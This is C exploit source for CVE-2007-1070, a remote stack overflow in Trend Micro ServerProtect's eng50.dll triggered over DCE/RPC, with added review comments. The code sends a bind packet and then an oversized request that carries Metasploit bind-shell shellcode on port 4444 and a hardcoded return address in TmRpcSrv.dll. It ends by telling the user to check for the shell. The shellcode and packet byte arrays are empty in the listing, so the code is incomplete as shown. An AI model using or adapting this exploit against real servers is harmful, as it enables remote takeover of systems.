
Trend Micro ServerProtect eng50.dll Remote Stack Overflow Exploit

Trend Micro ServerProtect eng50.dll Remote Stack Overflow Exploit

/*
 * Copyright (c) 2007 devcode
 *			^^ D E V C O D E ^^
 * Trend Micro ServerProtect eng50.dll Stack Overflow
 * [CVE-2007-1070]
 * Description:
 *    A boundary error within a function in eng50.dll can be
 *    exploited to cause a stack-based buffer overflow via a
 *    specially crafted RPC request to the SpntSvc.exe service.
 * Hotfix/Patch:
 * Vulnerable systems:
 *    ServerProtect for Windows 5.58
 *    ServerProtect for EMC 5.58
 *    ServerProtect for Network Appliance Filer 5.61
 *    ServerProtect for Network Appliance Filer 5.62
 * Tested on:
 * 	  Microsoft Windows 2000 SP4
 *    This is a PoC and was created for educational purposes only. The
 *    author is not held responsible if this PoC does not work or is
 *    used for any other purposes than the one stated above.
 * Notes:
 *	  <3 TippingPoint for technical details. Had this made a few days after
 *    disclosure (a few months back), was released on r1918 about a week ago
 *    and I noticed Trend Micro exploit reports on isc.sans.org. DIDNT KNOW
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <iostream>
#include <windows.h>
#pragma comment( lib, "ws2_32.lib" )
/* 25288888-bd5b-11d1-9d53-0080c83a5c2c v1.0 */
/* DCE/RPC bind PDU.  The line above is the interface UUID and version the
 * bind targets (presumably the RPC interface exposed by SpntSvc.exe).
 * NOTE(review): the byte contents of all three arrays are missing from this
 * listing.  main() sends sizeof(uszDceBind) - 1 bytes, i.e. it expects a
 * NUL-terminated byte-string literal. */
unsigned char uszDceBind[] =
/* rpc_opnum_0 */
/* DCE/RPC request header for opnum 0.  main() copies sizeof(uszDceCall)
 * bytes (terminator included) to offset 0 of the 2056-byte packet and then
 * writes the shellcode at offset 48, so any header bytes past 48 would be
 * overwritten. */
unsigned char uszDceCall[] =
/* win32_bind -  EXITFUNC=thread LPORT=4444 Size=342 Encoder=PexFnstenvMov http://metasploit.com */
/* Metasploit win32_bind payload: a bind shell listening on TCP/4444
 * (342 bytes, PexFnstenvMov encoder, per the generator line above).
 * main() copies sizeof(uszShellcode) - 1 bytes to packet offset 48. */
unsigned char uszShellcode[] =
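/*
 * Print the command-line synopsis to stdout.
 * Called by main() when fewer than two arguments are supplied.
 * The closing brace was missing from the listing; restored here.
 */
void usage( void ) {
	printf("\n\t\tTrend Micro ServerProtect Stack Overflow\n"
			"\t\t\t(c) 2007 devcode\n\n"
			"usage: tmicro.exe <ip> <port>\n");
}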
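/*
 * Entry point: connect to <ip>:<port>, send the DCE/RPC bind, then the
 * oversized opnum-0 request that overflows the stack buffer in eng50.dll.
 *
 * argv[1] - target IPv4 address in dotted-quad form (parsed with
 *           inet_addr(), so hostnames are rejected, not resolved)
 * argv[2] - TCP port of the SpntSvc.exe RPC endpoint, 1..65535
 *
 * Returns 0 once the request packet has been sent, -1 on a usage error or
 * on any Winsock failure.  Nothing about the target is verified beyond a
 * successful TCP connect and *some* reply to the bind; success of the
 * overflow itself is only observable out of band (bind shell on 4444).
 *
 * The packet layout is taken verbatim from the original PoC.  The offsets
 * only hold for the uszDceCall/uszShellcode byte strings it was written
 * with, and the overwritten return address is a fixed address inside the
 * TmRpcSrv.dll build found on the tested Windows 2000 SP4 system (no
 * ASLR), so it must be re-found for any other build.
 *
 * Fixes vs. the listing: missing closing braces restored, the port is
 * range-checked instead of passed through atoi(), inet_addr() failure is
 * detected, and WSACleanup()/closesocket() run on every exit path.
 */
int main( int argc, char **argv ) {
	enum {
		PACKET_SIZE      = 2056,  /* total bytes sent in the request */
		SHELLCODE_OFFSET = 48,    /* shellcode follows the request header */
		RET_OFFSET       = 1198,  /* saved return address overwritten here */
		LENGTH_OFFSET    = 2048   /* two trailing DWORDs, 0x000007D0 each */
	};
	WSADATA wsaData;
	SOCKET sConnect;
	SOCKADDR_IN sockAddr;
	char szRecvBuf[512];
	unsigned char uszPacket[PACKET_SIZE];
	char *pEnd = NULL;
	long lPort;
	int nRet = -1;

	if ( argc < 3 ) {
		usage( );
		return -1;
	}

	/* Validate the port before touching the network: atoi() would silently
	 * map "abc" to 0 and 70000 to a truncated 16-bit value. */
	lPort = strtol( argv[2], &pEnd, 10 );
	if ( pEnd == argv[2] || *pEnd != '\0' || lPort < 1 || lPort > 65535 ) {
		printf("[-] Invalid port: %s\n", argv[2]);
		return -1;
	}

	/* The shellcode must end before the return-address slot, otherwise the
	 * copy below would clobber the overwrite; the header must fit at all. */
	if ( (size_t)SHELLCODE_OFFSET + ( sizeof( uszShellcode ) - 1 ) > (size_t)RET_OFFSET ||
	     sizeof( uszDceCall ) > (size_t)PACKET_SIZE ) {
		printf("[-] Payload does not fit the packet layout\n");
		return -1;
	}

	if ( WSAStartup( MAKEWORD( 2, 0 ), &wsaData ) != NO_ERROR ) {
		printf("[-] Unable to startup winsock\n");
		return -1;
	}

	memset( &sockAddr, 0, sizeof( sockAddr ) );
	sockAddr.sin_family = AF_INET;
	sockAddr.sin_addr.s_addr = inet_addr( argv[1] );
	sockAddr.sin_port = htons( (unsigned short)lPort );
	/* inet_addr() reports failure only through INADDR_NONE; without this
	 * check a mistyped address would be sent to 255.255.255.255. */
	if ( sockAddr.sin_addr.s_addr == INADDR_NONE ) {
		printf("[-] Invalid IPv4 address: %s\n", argv[1]);
		goto cleanup_wsa;
	}

	sConnect = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
	if ( sConnect == INVALID_SOCKET ) {
		printf("[-] Invalid socket\n");
		goto cleanup_wsa;
	}

	printf("[+] Connecting to %s:%s\n", argv[1], argv[2] );
	if ( connect( sConnect, (SOCKADDR *)&sockAddr, sizeof( sockAddr ) ) == SOCKET_ERROR ) {
		printf("[-] Cannot connect to server\n");
		goto cleanup_socket;
	}

	/* Stage 1: bind to the RPC interface.  The trailing NUL of the
	 * byte-string literal is not part of the PDU, hence the "- 1". */
	printf("[+] Sending DCE Bind packet...\n");
	if ( send( sConnect, (const char *)uszDceBind, sizeof( uszDceBind ) - 1, 0 ) == SOCKET_ERROR ) {
		printf("[-] Cannot send\n");
		goto cleanup_socket;
	}
	/* The bind reply is not parsed; any bytes at all count as success. */
	if ( recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 ) <= 0 ) {
		printf("[-] Recv failed\n");
		goto cleanup_socket;
	}

	/* Stage 2: build the request.  Everything not explicitly written is
	 * 0x41 ('A') filler, which is what overruns the stack buffer. */
	memset( uszPacket, 0x41, sizeof( uszPacket ) );
	/* Request header for opnum 0.  NOTE(review): unlike the other two
	 * copies this one includes the literal's terminating NUL, exactly as in
	 * the original PoC; confirm against the real header length before
	 * changing it. */
	memcpy( uszPacket, uszDceCall, sizeof( uszDceCall ) );
	memcpy( uszPacket + SHELLCODE_OFFSET, uszShellcode, sizeof( uszShellcode ) - 1 );
	/* Saved return address -> 0x6574131C, a "call ebx" in TmRpcSrv.dll
	 * (the original also notes 0x7C4E4A66, "jmp ebx" in kernel32.dll, as a
	 * second candidate).  Little-endian, hence the reversed byte order. */
	memcpy( uszPacket + RET_OFFSET, "\x1C\x13\x74\x65", 4 );
	/* Two little-endian DWORDs of 0x000007D0 (2000) at the tail of the
	 * packet; presumably length fields the vulnerable routine trusts. */
	memcpy( uszPacket + LENGTH_OFFSET, "\xD0\x07\x00\x00\xD0\x07\x00\x00", 8 );

	printf("[+] Sending DCE Request packet...\n");
	if ( send( sConnect, (const char *)uszPacket, sizeof( uszPacket ), 0 ) == SOCKET_ERROR ) {
		printf("[-] Cannot send\n");
		goto cleanup_socket;
	}

	printf("[+] Check shell on port 4444 :)\n");
	/* Block until the service answers or drops the connection; the data is
	 * irrelevant because success is observed out of band on port 4444. */
	(void)recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );
	nRet = 0;

cleanup_socket:
	closesocket( sConnect );
cleanup_wsa:
	WSACleanup( );
	return nRet;
}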
